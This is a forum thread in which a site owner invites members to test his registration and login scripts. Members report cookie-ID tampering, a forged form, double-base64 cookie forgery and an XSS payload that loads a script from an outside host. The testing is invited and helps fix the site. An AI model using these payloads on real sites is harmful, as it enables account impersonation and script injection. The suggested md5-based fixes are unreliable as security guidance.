Break This Script!

[Tree]

Break This Script! [+rep]

Bored?

Go to http://www.vestieo.com and see if you can break that script (or just fool it).

If you want something else to do, go to http://www.vestieo.com/manage and try to break that login script.

I'm trying to make this thing idiot proof, so do your worst

To register more than once, just hit the "Kill Cookie" button at the bottom.

If you do manage to break it, please post below.

 

[Jim_]

I can edit my cookie to change the id and pretend I'm someone else. :P
ID: 1
Country: USA
IP: 24.99.249.87
Age: 43
Gender: male
Date Created: 2006-02-24

Its also possible to create your own form and make up different genders:
ID: 56
Country: USA
IP: 24.161.93.195
Age: 100
Gender: Jim Has No Gender!
Date Created: 2006-02-25

 

[stscac]

I can edit my cookie to change the id and pretend I'm someone else. :P
ID: 1
Country: USA
IP: 24.99.249.87
Age: 43
Gender: male
Date Created: 2006-02-24

Its also possible to create your own form and make up different genders:
ID: 56
Country: USA
IP: 24.161.93.195
Age: 100
Gender: Jim Has No Gender!
Date Created: 2006-02-25

:lol:

Good work. But I hope you have a gender.



-Steve

 

[Tree]

k, I'll fix the ID thing, but how did you change the gender?

I can edit my cookie to change the id and pretend I'm someone else. :P
ID: 1
Country: USA
IP: 24.99.249.87
Age: 43
Gender: male
Date Created: 2006-02-24

Its also possible to create your own form and make up different genders:
ID: 56
Country: USA
IP: 24.161.93.195
Age: 100
Gender: Jim Has No Gender!
Date Created: 2006-02-25

 

[Jim_]

<form action="http://www.vestieo.com/?" method="POST">
Age: <input type="text" name="age"><br>
Gender: 
<select name="gender">
	<option value="Jim Has No Gender!">lol. Pants.</option>
	<option value="Male">Male</option>
	<option value="Female">Female</option>

</select><br>
<input type="submit" name="Thank you!"><br>
<input type="hidden" name="done" value="yep">

Like that.

You might want to put a check in to make sure they choose male or female.
Also, make sure that the age they enter is greater than 0.

 

[Tree]

Alright, some of the issues have been fixed. Try again!

FYI, I wiped the DB.

Edit: Nevermind, there's still a lot of problems. Let me work on it real quick.

 

[tm]

if i type in <?php it says error, headers already sent.

 

[Jim_]

XSS vulnerability.
enter this for age: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

 

[Tree]

Age is limited to 2 characters now.

Everything is fixed and there should be no security holes.

Jim, not sure what you meant by "XSS vulnerability."

 

[tm]

Age is limited to 2 characters now.

what about that 129 year old in china?

 

[White-Doc]

Eeerm,
Not sure if it's really effective now.
But I can change my cookie using the following code:

"javascript:void(document.cookie="1337h4x0r0fd00m");alert(document.cookie)"

Meh, it's useless I know.

 

[Tree]

Alright, so we've shut this script up. Thanks to everyone who helped, especially Jim!

Now onto the login script!

http://www.vestieo.com/manage

Once again, a huge thank you to everyone who has helped thus far.

 

[Jim_]

So far, the login page seems safe.

Oh. I can still cheat the cookies. Just have to base64 encode it twice.
TVRJPQ%3D%3D is id 12
TVRNPQ%3D%3D is id 13

You might want to generate a random passkey for each id instead.
ex: $password = md5($id . rand(10000,99999));
and then pull the id with the passkey that matches the cookie.

 

[Tree]

Alright, this is for the first or second script?

 

[Jim_]

I can still cheat the cookies on the first script.

 

[Tree]

Workin on it.

Fixed

Try it now.

Oh, and Jim, thanks tons! I used that exact little piece of code and it works great!

 

[White-Doc]

Hi,
I've had a go at the Login one, and I can't seem to find any exploits of vunerabilities, so either your script is somewhat secure. Or I'm not good enough to find a exploit.

Yours faithfully,
Steve

 

[Dan]

If you have the id and the password in cookies, I don't think it can be broken.. unless they know your password.

 

[Tree]

Alright, great!

I will change the encoding on the cookies though. Before it was just base64_encoded twice. I'll change it to md5.

Thanks everyone!